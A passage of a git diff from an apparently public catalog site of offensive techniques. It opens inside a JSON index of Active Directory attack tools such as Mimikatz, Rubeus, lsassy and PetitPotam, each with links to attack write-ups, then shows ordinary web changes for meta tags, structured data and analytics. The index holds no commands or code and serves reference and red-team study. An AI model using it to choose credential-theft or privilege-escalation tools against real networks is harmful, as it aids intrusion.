tform":["Linux","Windows","ActiveDirectory"],"references":["https://nmap.org/download.html","https://nmap.org/nsedoc/scripts/krb5-enum-users.html"],"count":1},{"id":"wadcoms:PKINIT","name":"PKINIT","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"],"count":2},{"id":"wadcoms:PSADmodule","name":"PSADmodule","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/samratashok/ADModule"],"count":1},{"id":"wadcoms:PetitPotam","name":"PetitPotam","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/topotam/PetitPotam","https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory"],"count":1},{"id":"wadcoms:Powershell","name":"Powershell","source":"WADComs","platform":["Windows"],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule","https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html"],"count":1},{"id":"wadcoms:PwshADmodule","name":"PwshADmodule","source":"WADComs","platform":["Windows"],"references":["https://redfoxsec.com/blog/attacking-kerberos-delegation/","https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://github.com/samratashok/ADModule","https://docs.microsoft.com/en-us/powershell/module/activedirectory/"],"count":2},{"id":"wadcoms:PyLDAPmonitor","name":"PyLDAPmonitor","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/python"],"count":1},{"id":"wadcoms:PyWhisker","name":"PyWhisker","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/shutdownrepo/pywhisker"],"count":1},{"id":"wadcoms:RPCClient","name":"RPCClient","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","https://www.ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging"],"count":1},{"id":"wadcoms:Regexe","name":"Regexe","source":"WADComs","platform":["Windows"],"references":["https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/","https://www.hackingarticles.in/windows-persistence-using-winlogon/","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg","https://docs.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key"],"count":1},{"id":"wadcoms:Responder","name":"Responder","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/lgandx/Responder","https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing","https://attack.mitre.org/techniques/T1557/001/"],"count":2},{"id":"wadcoms:Rubeus","name":"Rubeus","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asreproast","https://github.com/GhostPack/Rubeus#asktgt","https://github.com/GhostPack/Rubeus#brute","https://github.com/GhostPack/Rubeus#kerberoast","https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/constrained-delegation","https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/diamond-ticket","https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1558/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation"],"count":15},{"id":"wadcoms:SMBClient","name":"SMBClient","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"],"count":5},{"id":"wadcoms:SMBMap","name":"SMBMap","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"],"count":3},{"id":"wadcoms:SafetyKatz","name":"SafetyKatz","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SafetyKatz","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:Seatbelt","name":"Seatbelt","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/Seatbelt","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpDump","name":"SharpDump","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SharpDump","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpHound","name":"SharpHound","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html","https://bloodhound.specterops.io/collect-data/ce-collection/sharphound","https://github.com/ZishanAdThandar/pentest/blob/main/notes/ActiveDirectory.md#bloodhound"],"count":2},{"id":"wadcoms:SharpLDAPmonitor","name":"SharpLDAPmonitor","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/csharp"],"count":1},{"id":"wadcoms:SharpUp","name":"SharpUp","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SharpUp","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpWMI","name":"SharpWMI","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpWMI","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:Snaffler","name":"Snaffler","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/SnaffCon/Snaffler"],"count":1},{"id":"wadcoms:Windapsearch","name":"Windapsearch","source":"WADComs","platform":["Linux","Windows"],"references":["https://github.com/ropnop/windapsearch","https://www.attackdebris.com/?p=470"],"count":1},{"id":"wadcoms:bloodyAD","name":"bloodyAD","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/CravateRouge/bloodyAD","https://adminions.ca/books/active-directory-enumeration-and-exploitation/page/bloodyad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse","https://www.thehacker.recipes/ad/movement/dacl/addmember","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"count":9},{"id":"wadcoms:lsassy","name":"lsassy","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://en.hackndo.com/remote-lsass-dump-passwords/","https://github.com/login-securite/lsassy?tab=readme-ov-file"],"count":1},{"id":"wadcoms:targetedKerberoast","name":"targetedKerberoast","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ShutdownRepo/targetedKerberoast"],"count":1},{"id":"wadcoms:winPEAS","name":"winPEAS","source":"WADComs","platform":["Windows"],"references":["https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS","https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/README.md","https://book.hacktricks.xyz/windows/windows-local-privilege-escalation"],"count":1},{"id":"wadcoms:adidnsdump","name":"adidnsdump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/adidnsdump","https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/","https://attack.mitre.org/techniques/T1590/002/"],"count":1},{"id":"wadcoms:Certify","name":"Certify","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"count":1},{"id":"wadcoms:Certipy","name":"Certipy","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://www.thehacker.recipes/ad/movement/adcs","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/kerberos/pkinit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://www.thehacker.recipes/ad/movement/adcs/certificate-templates","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"count":12},{"id":"wadcoms:Coercer","name":"Coercer","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/p0dalirius/Coercer","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/","https://podalirius.net/en/articles/coercer-an-automatic-authentication-coercion-tool/"],"count":2},{"id":"wadcoms:Comsvcs","name":"Comsvcs","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://lolbas-project.github.io/lolbas/Libraries/comsvcs/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:CVE","name":"CVE","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Bdenneu/CVE-2022-33679","https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html","https://horizon3.ai/attack-research/attack-blogs/from-cve-2022-33679-to-unauthenticated-kerberoasting/"],"count":1},{"id":"wadcoms:DFSCoerce","name":"DFSCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Wh04m1001/DFSCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-dfsnm"],"count":1},{"id":"wadcoms:DonPAPI","name":"DonPAPI","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/login-securite/DonPAPI","https://www.login-securite.com/2022/03/28/donpapi/"],"count":1},{"id":"wadcoms:EfsPotato","name":"EfsPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/zcgonvh/EfsPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:GodPotato","name":"GodPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/BeichenDream/GodPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato","https://attack.mitre.org/techniques/T1134/002/"],"count":1},{"id":"wadcoms:Hashcat","name":"Hashcat","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://attack.mitre.org/techniques/T1558/004/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/005/","https://www.thehacker.recipes/ad/movement/kerberos/kerberoast","https://attack.mitre.org/techniques/T1558/003/","https://github.com/evilmog/ntlmv1-multi","https://crack.sh/netntlm/","https://www.thehacker.recipes/ad/movement/ntlm/capture","https://attack.mitre.org/techniques/T1110/002/","https://github.com/fortra/impacket/blob/master/examples/secretsdump.py","https://attack.mitre.org/techniques/T1003/002/"],"count":6},{"id":"wadcoms:Impacket-dacledit","name":"Impacket-dacledit","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"count":1},{"id":"wadcoms:Impacket-describeTicket","name":"Impacket-describeTicket","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"count":1},{"id":"wadcoms:Impacket-findDelegation","name":"Impacket-findDelegation","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/delegations","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation"],"count":1},{"id":"wadcoms:Impacket-goldenPac","name":"Impacket-goldenPac","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://github.com/fortra/impacket/blob/master/examples/goldenPac.py","https://attack.mitre.org/techniques/T1558/"],"count":1},{"id":"wadcoms:Impacket-mssqlclient","name":"Impacket-mssqlclient","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql","https://www.thehacker.recipes/ad/movement/mssql/execution"],"count":2},{"id":"wadcoms:Impacket-owneredit","name":"Impacket-owneredit","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"count":1},{"id":"wadcoms:Impacket-raiseChild","name":"Impacket-raiseChild","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/domain-trusts/child-parent","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection"],"count":1},{"id":"wadcoms:Impacket-ticketConverter","name":"Impacket-ticketConverter","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"count":1},{"id":"wadcoms:John","name":"John","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/openwall/john","https://hashcat.net/wiki/doku.php?id=example_hashes","https://attack.mitre.org/techniques/T1555/005/","https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate","https://attack.mitre.org/techniques/T1110/002/"],"count":2},{"id":"wadcoms:JuicyPotatoNG","name":"JuicyPotatoNG","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/antonioCoco/JuicyPotatoNG","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato"],"count":1},{"id":"wadcoms:Krbrelayx","name":"Krbrelayx","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/krbrelayx","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained"],"count":1},{"id":"wadcoms:LaZagne","name":"LaZagne","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/AlessandroZ/LaZagne","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/"],"count":1},{"id":"wadcoms:ldapdomaindump","name":"ldapdomaindump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/ldapdomaindump","https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:ldapnomnom","name":"ldapnomnom","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/lkarlslund/ldapnomnom","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:ldeep","name":"ldeep","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/franc-pentest/ldeep","https://www.hackingarticles.in/active-directory-enumeration-ldeep/","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:MANSPIDER","name":"MANSPIDER","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/blacklanternsecurity/MANSPIDER","https://www.blacklanternsecurity.com/2020-11-04-MANSPIDER/"],"count":1},{"id":"wadcoms:Mimikatz","name":"Mimikatz","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://attack.mitre.org/techniques/T1552/004/","https://www.dcshadow.com/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcshadow","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync","https://attack.mitre.org/techniques/T1003/006/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/002/","https://attack.mitre.org/techniques/T1003/004/","https://book.hacktricks.xyz/windows-hardening/ntlm/pass-the-hash","https://attack.mitre.org/techniques/T1550/002/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1550/003/","https://adsecurity.org/?p=1275","https://attack.mitre.org/techniques/T1556/001/"],"count":10},{"id":"wadcoms:Nanodump","name":"Nanodump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/fortra/nanodump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:Nltest","name":"Nltest","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)","https://attack.mitre.org/techniques/T1482/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":1},{"id":"wadcoms:noPac","name":"noPac","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":2},{"id":"wadcoms:PowerMad","name":"PowerMad","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/Kevin-Robertson/Powermad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"count":1},{"id":"wadcoms:PowerUpSQL","name":"PowerUpSQL","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/how-to-hack-database-links-in-sql-server/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.netspi.com/blog/technical-blog/network-penetration-testing/finding-sensitive-data-domain-sql-servers-powerupsql/","https://www.netspi.com/blog/technical-blog/network-penetration-testing/establishing-registry-persistence-via-sql-server-powerupsql/"],"count":3},{"id":"wadcoms:PowerView","name":"PowerView","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/","https://www.thehacker.recipes/ad/movement/dacl/grant-rights.html","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://wald0.com/?p=112","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"count":11},{"id":"wadcoms:pre2k","name":"pre2k","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":2},{"id":"wadcoms:PrinterBug","name":"PrinterBug","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/krbrelayx","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"count":1},{"id":"wadcoms:PrintSpoofer","name":"PrintSpoofer","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/itm4n/PrintSpoofer","https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:Procdump","name":"Procdump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:pyGPOAbuse","name":"pyGPOAbuse","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Hackndo/pyGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"count":1},{"id":"wadcoms:Pypykatz","name":"Pypykatz","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/skelsec/pypykatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:RoguePotato","name":"RoguePotato","source":"DAEMON","platform":["Windows","Linux","ActiveDirectory"],"references":["https://github.com/antonioCoco/RoguePotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:sam","name":"sam","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/WazeHell/sam-the-admin","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"count":1},{"id":"wadcoms:ShadowCoerce","name":"ShadowCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ShutdownRepo/ShadowCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp"],"count":1},{"id":"wadcoms:SharpChrome","name":"SharpChrome","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/003/"],"count":1},{"id":"wadcoms:SharpDPAPI","name":"SharpDPAPI","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"count":1},{"id":"wadcoms:SharpGPOAbuse","name":"SharpGPOAbuse","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"count":2},{"id":"wadcoms:SharpView","name":"SharpView","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/tevora-threat/SharpView","https://github.com/PowerShellMafia/PowerSploit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":1},{"id":"wadcoms:SpoolSample","name":"SpoolSample","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/leechristensen/SpoolSample","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"count":1},{"id":"wadcoms:SweetPotato","name":"SweetPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/CCob/SweetPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:Whisker","name":"Whisker","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/eladshamir/Whisker","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"count":1}] +\ No newline at end of file diff --git a/src/layouts/Base.astro b/src/layouts/Base.astro @@ -4,6 +4,7 @@ import Header from '../components/Header.astro'; import Footer from '../components/Footer.astro'; import SearchModal from '../components/SearchModal.astro'; import { url } from '../lib/url'; +import { serialize, type JsonLd } from '../lib/jsonld'; import '../styles/app.css'; // Preload the two faces that paint above the fold — the wordmark in the // masthead and the DM Mono the masthead/labels use — so the header does not flash @@ -15,12 +16,21 @@ interface Props { title?: string; description?: string; railless?: boolean; + /** schema.org objects for this page; see src/lib/jsonld.ts */ + jsonLd?: JsonLd | JsonLd[]; } const { + jsonLd, title = 'DÆMONBins — the Off-the-Land Almanac', description = 'One filterable catalog merging GTFOBins, LOLBAS and WADComs — plus DÆMON modern additions. Living-off-the-land and offensive techniques by platform, capability and source.', } = Astro.props; -const canonical = new URL(Astro.url.pathname, Astro.site).href; +// Canonical = site origin + slash-less path (`trailingSlash: 'never'` in +// astro.config.mjs; vercel.json 308s `/x/` → `/x`, so a slashed canonical +// would point every page at a redirect). Only `/` keeps its slash. +const canonical = new URL(Astro.url.pathname.replace(/(.)\/$/, '$1'), Astro.site).href; +// Social card: crawlers need an absolute URL and a raster — the PNG is rendered +// from the SVG template by `npm run og` (scripts/og.mjs) and committed. +const ogImage = new URL('og.png', Astro.site).href; --- <!doctype html> <html lang="en" data-theme="light"> @@ -36,18 +46,31 @@ const canonical = new URL(Astro.url.pathname, Astro.site).href; <meta name="theme-color" content="#191724" media="(prefers-color-scheme: dark)" /> <meta name="theme-color" content="#faf4ed" media="(prefers-color-scheme: light)" /> <meta property="og:type" content="website" /> + <meta property="og:site_name" content="DÆMONBins" /> + <meta property="og:url" content={canonical} /> <meta property="og:title" content={title} /> <meta property="og:description" content={description} /> - <meta property="og:image" content={url('og.svg')} /> + <meta property="og:image" content={ogImage} /> + <meta property="og:image:width" content="1200" /> + <meta property="og:image:height" content="630" /> + <meta property="og:image:alt" content="DÆMONBins — the Off-the-Land Almanac: GTFOBins × LOLBAS × WADComs merged into one catalog" /> <meta name="twitter:card" content="summary_large_image" /> + <meta name="twitter:title" content={title} /> + <meta name="twitter:description" content={description} /> + <meta name="twitter:image" content={ogImage} /> + {jsonLd && <script is:inline type="application/ld+json" set:html={serialize(jsonLd)} />} <!-- Set theme before first paint to avoid FOUC --> <script is:inline> (function () { function apply() { try { var t = localStorage.getItem('theme'); - // Dawn (cream) is the default, matching the main DÆMON site. - if (t !== 'light' && t !== 'dark') t = 'light'; + // No stored choice: follow the OS. Dawn (cream) is the default when + // the OS has no preference, matching the main DÆMON site — but a + // dark-mode reader should not get a cream page under dark chrome. + if (t !== 'light' && t !== 'dark') { + t = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light'; + } document.documentElement.setAttribute('data-theme', t); document.documentElement.style.colorScheme = t; } catch (e) { @@ -76,9 +99,24 @@ const canonical = new URL(Astro.url.pathname, Astro.site).href; document.addEventListener('astro:after-swap', apply); })(); </script> + {import.meta.env.PROD && ( + <Fragment> + {/* Vercel Web Analytics + Speed Insights. Zero-dependency: Vercel serves + these scripts at the edge once the features are enabled for the + project (Vercel dashboard → Analytics / Speed Insights). They live in + <head> so Astro's ClientRouter keeps them across view transitions + rather than re-running them per navigation. Privacy-friendly and + cookieless; no-op in dev. */} + <script is:inline>window.va = window.va || function () { (window.vaq = window.vaq || []).push(arguments); };</script> + <script is:inline defer src="/_vercel/insights/script.js"></script> + <script is:inline>window.si = window.si || function () { (window.siq = window.siq || []).push(arguments); };</script> + <script is:inline defer src="/_vercel/speed-insights/script.js"></script> + </Fragment> + )} <ClientRouter /> </head> <body> + <a class="skip-link" href="#main">Skip to content</a> <!-- The film over the whole page. It is what keeps a flat colour reading as stock rather than as a swatch, and it stands in for the texture the old glass build got from blur. --> diff --git a/src/lib/jsonld.ts b/src/lib/jsonld.ts @@ -0,0 +1,153 @@ +// Structured data (schema.org JSON-LD) builders. Pure: every function takes +// what it needs and returns a plain object; Base.astro serialises whatever a +// page hands it. Kept small on purpose — the goal is a correct WebSite / +// TechArticle / BreadcrumbList / Dataset graph, not every property Google lists. + +import { SOURCE_META, SOURCES } from './taxonomy'; +import type { SourceId } from './taxonomy'; +import type { Technique, Tool } from './techniques'; + +export type JsonLd = Record<string, unknown>; + +export const SITE_NAME = 'DÆMONBins'; +export const SITE_FALLBACK = 'https://lotl.daemon-sec.xyz'; +const GPL = 